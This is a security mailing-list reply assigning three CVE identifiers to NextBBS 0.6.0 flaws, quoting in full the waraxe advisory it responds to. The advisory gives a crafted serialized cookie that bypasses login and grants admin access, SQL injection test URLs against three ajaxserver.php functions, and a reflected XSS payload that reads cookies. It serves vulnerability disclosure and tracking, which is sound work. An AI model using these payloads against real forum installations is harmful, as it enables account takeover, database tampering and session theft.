Re: CVE-request: NextBBS 0.6.0 waraxe-2012-SA#080

[Kurt Seifried <kseifried () redhat com>]

On 03/28/2012 11:34 PM, Henri Salo wrote:
> Can I get three 2012 CVEs for NextBBS issues in 0.6.0, thanks.
>
> 1. user.php Cookie Parsing Authentication Bypass http://osvdb.org/show/osvdb/80626

Please use CVE-2012-1602 for this issue.

> 2. ajaxserver.php Multiple Function SQL Injection http://osvdb.org/show/osvdb/80637 
> (findUsers/isIdAvailable/getGreetings)

Please use CVE-2012-1603 for these SQL injection issues.

> 3. index.php do Parameter XSS http://osvdb.org/show/osvdb/80627

Please use CVE-2012-1604 for this issue.

This makes me sooo happy =) Not just a perfect CVE request but the
split/merge of the CVE's is also correct (e.g. 3 SQL injeciton vulns in
the same bit of code generally = merge =).

> http://packetstormsecurity.org/files/111250/NextBBS-0.6.0-Authentication-Bypass-SQL-Injection-XSS.html
> http://www.waraxe.us/advisory-80.html
>
> Quoting the advisory http://seclists.org/bugtraq/2012/Mar/134
> """
> [waraxe-2012-SA#080] - Multiple Vulnerabilities in NextBBS 0.6.0
> ===============================================================================
>
> Author: Janek Vind "waraxe"
> Date: 27. March 2012
> Location: Estonia, Tartu
> Web: http://www.waraxe.us/advisory-80.html
>
>
> Description of vulnerable software:
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
> nextBBS lets you create your own Community with unrivaled ease of use.
> Even though the software is highly performant, it doesn't lack any feature
> that makes big boards attractive. In fact, it offers the most "Web 2.0"
> experience currently available. 
>
> http://sourceforge.net/projects/forums/
>
> Vulnerable versions
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
> Affected is NextBBS version 0.6.0, older versions may be vulnerable
> as well.
>
> ###############################################################################
> 1. Authentication Bypass in "user.php"
> ###############################################################################
>
> Reason: using unsanitized user submitted data
> Attack vector: user submitted cookie
> Preconditions: none
> Result: attacker can impersonate any user, including admins
>
> Source code snippet from vulnerable script "user.php":
> -----------------[ source code start ]---------------------------------
> // Cookie?
> if(isset($_COOKIE[$CONFIG->sessions->name]) || isset($_SESSION[$CONFIG->sessions->name]))
> {
> ..
>         if(isset($_COOKIE[$CONFIG->sessions->name]))
>         {
>                 $scookie = $_COOKIE[$CONFIG->sessions->name];
> ..
>                 $cookie = unserialize(stripslashes($scookie));
> ..
>                 $checkagainst = $this->generatePrivateKey($row['password']);
>                 if($checkagainst == $cookie['userkey'])
>                 {
>                         $_SESSION['ID'] = $uid;
>                         $this->setMember($_SESSION['ID']);
> -----------------[ source code end ]-----------------------------------
>
> As seen above, user submitted cookie will be unserialized and resulting
> data is used for authentication. No input data validation exists.
> Attacker can use specially crafted cookie, so that after unserializing
> variable "$cookie['userkey']" will be boolean "true".
> Comparing as "if($checkagainst == $cookie['userkey'])" is insecure and will
> always return "true", if "$cookie['userkey']" is boolean "true".
> This will allow complete authentication bypass.
>
> Test:
>
> Array after serialization:
> a:3:{s:3:"uid";s:4:"1219";s:7:"checker";s:1:"1";s:7:"userkey";b:1;}
> After urlencoding:
> a%3A3%3A%7Bs%3A3%3A%22uid%22%3Bs%3A4%3A%221219%22%3Bs%3A7%3A%22checker%22%3Bs%3A1%3A%221%22%3Bs%3A7%3A%22userkey%22%3Bb%3A1%3B%7D
> Cookie:
> nextBBS=a%3A3%3A%7Bs%3A3%3A%22uid%22%3Bs%3A4%3A%221219%22%3Bs%3A7%3A%22checker%22%3Bs%3A1%3A%221%22%3Bs%3A7%3A%22userkey%22%3Bb%3A1%3B%7D;
>
>
> Now we will use Firefox with "Tamper Data" extension for easy cookie manipulation.
> Let's open page in unauthenticated state and with crafted cookie:
>
> http://localhost/nextbbs.0.6.0/
>
> Result: "Welcome back, waraxe. (Log out?) (Admin CP)"
>
> We have admin level access now, as expected.
>
> ###############################################################################
> 2. SQL Injection in "ajaxserver.php" function "findUsers"
> ###############################################################################
>
> Reason: using unsanitized user submitted data in SQL queries
> Attack vector: user submitted GET parameter "curstr"
> Preconditions: none
> Result: attacker can manipulate database queries
>
> Source code snippet from vulnerable script "ajaxserver.php":
> -----------------[ source code start ]---------------------------------
> function findUsers($method)
> {
>         global $INPUT, $CONFIG, $DB;
>         
>         $filter = urldecode($INPUT['curstr']);
>         $retstr = '';
>         $qry = "SELECT userid FROM {$CONFIG->dbprfx}users 
>                 WHERE server='{$CONFIG->server}' AND userid like '".$filter."%'";
>         $res = $DB->query($qry);
> -----------------[ source code end ]-----------------------------------
>
> As seen above, user submitted GET parameter "curstr" is urldecoded and
> afterwards used in SQL query without proper sanitization. By using urlencoded
> single quotes it is possible to conduct SQL injection atttacks. 
>
> Test:
>
> http://localhost/nextbbs.0.6.0/?do=ajaxserver&action=findusers&curstr=war%2527axe
>
> Result:
>
> SQL Layer Error: You have an error in your SQL syntax; check the manual
> that corresponds to your MySQL server version for the right syntax to use
> near 'axe%'' at line 1
> Query [SELECT userid FROM bb_users WHERE server='1' AND userid like 'war'axe%']
>
>
> ###############################################################################
> 3. SQL Injection in "ajaxserver.php" function "isIdAvailable"
> ###############################################################################
>
> Reason: using unsanitized user submitted data in SQL queries
> Attack vector: user submitted GET parameter "id"
> Preconditions: none
> Result: attacker can manipulate database queries
>
> Source code snippet from vulnerable script "ajaxserver.php":
> -----------------[ source code start ]---------------------------------
> function isIdAvailable($method)
> {
>         global $INPUT, $CONFIG, $DB;
>
>         $filter = urldecode($INPUT['id']);
>         $qry = "SELECT COUNT(*) as c FROM {$CONFIG->dbprfx}users
>                 WHERE server='{$CONFIG->server}' AND userid ='".$filter."'";
>         $res = $DB->query($qry);
> -----------------[ source code end ]-----------------------------------
>
> As seen above, user submitted GET parameter "id" is urldecoded and
> afterwards used in SQL query without proper sanitization. By using urlencoded
> single quotes it is possible to conduct SQL injection atttacks. 
>
> Test:
>
> http://localhost/nextbbs.0.6.0/?do=ajaxserver&action=isidavailable&id=war%2527axe
>
> Result:
>
> SQL Layer Error: You have an error in your SQL syntax; check the manual
> that corresponds to your MySQL server version for the right syntax to use
> near 'axe'' at line 1
> Query [SELECT COUNT(*) as c FROM bb_users WHERE server='1' AND userid ='war'axe']
>
>
> ###############################################################################
> 4. SQL Injection in "ajaxserver.php" function "getGreetings"
> ###############################################################################
>
> Reason: using unsanitized user submitted data in SQL queries
> Attack vector: user submitted GET parameter "username"
> Preconditions: none
> Result: attacker can manipulate database queries
>
> Source code snippet from vulnerable script "ajaxserver.php":
> -----------------[ source code start ]---------------------------------
> function getGreetings($method)
> {
>         global $INPUT, $CONFIG, $DB;
>         
>         $username = urldecode($INPUT['username']);
>         $qry = "SELECT text FROM {$CONFIG->dbprfx}greetings g JOIN
>                 {$CONFIG->dbprfx}users u ON (g.dest_id=u.user_ID)
>                 WHERE g.server='{$CONFIG->server}' AND 
>                 u.userid='{$username}' AND g.folder_id='1'";
>         $res = $DB->query($qry);
> -----------------[ source code end ]-----------------------------------
>
> As seen above, user submitted GET parameter "username" is urldecoded and
> afterwards used in SQL query without proper sanitization. By using urlencoded
> single quotes it is possible to conduct SQL injection atttacks. 
>
> Test:
>
> http://localhost/nextbbs.0.6.0/?do=ajaxserver&action=getgreetings&username=war%2527axe
>
> Result:
>
> SQL Layer Error: You have an error in your SQL syntax; check the manual
> that corresponds to your MySQL server version for the right syntax to use
> near 'axe' AND g.folder_id='1'' at line 1
> Query [SELECT text FROM bb_greetings g JOIN bb_users u ON (g.dest_id=u.user_ID)
>  WHERE g.server='1' AND u.userid='war'axe' AND g.folder_id='1']
>
>
> ###############################################################################
> 5. Reflected XSS in anti-hack measures
> ###############################################################################
>
> Reason: using unsanitized user submitted data in outputted html
> Attack vector: user submitted URI
> Remarks: XSS payload max length is limited
>
> Test:
>
> http://localhost/nextbbs.0.6.0/index.php?do=<body+onload=alert(document.cookie);>
>
> Response page shows warning:
>
> "Note: A hack attempt was detected.
> It is being logged and reported to the admin along with your IP address:"
>
> At the same time XSS payload execution can be observed.
>
>
> Contact:
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
> come2waraxe () yahoo com
> Janek Vind "waraxe"
> """
>
> - Henri Salo


-- 
Kurt Seifried Red Hat Security Response Team (SRT)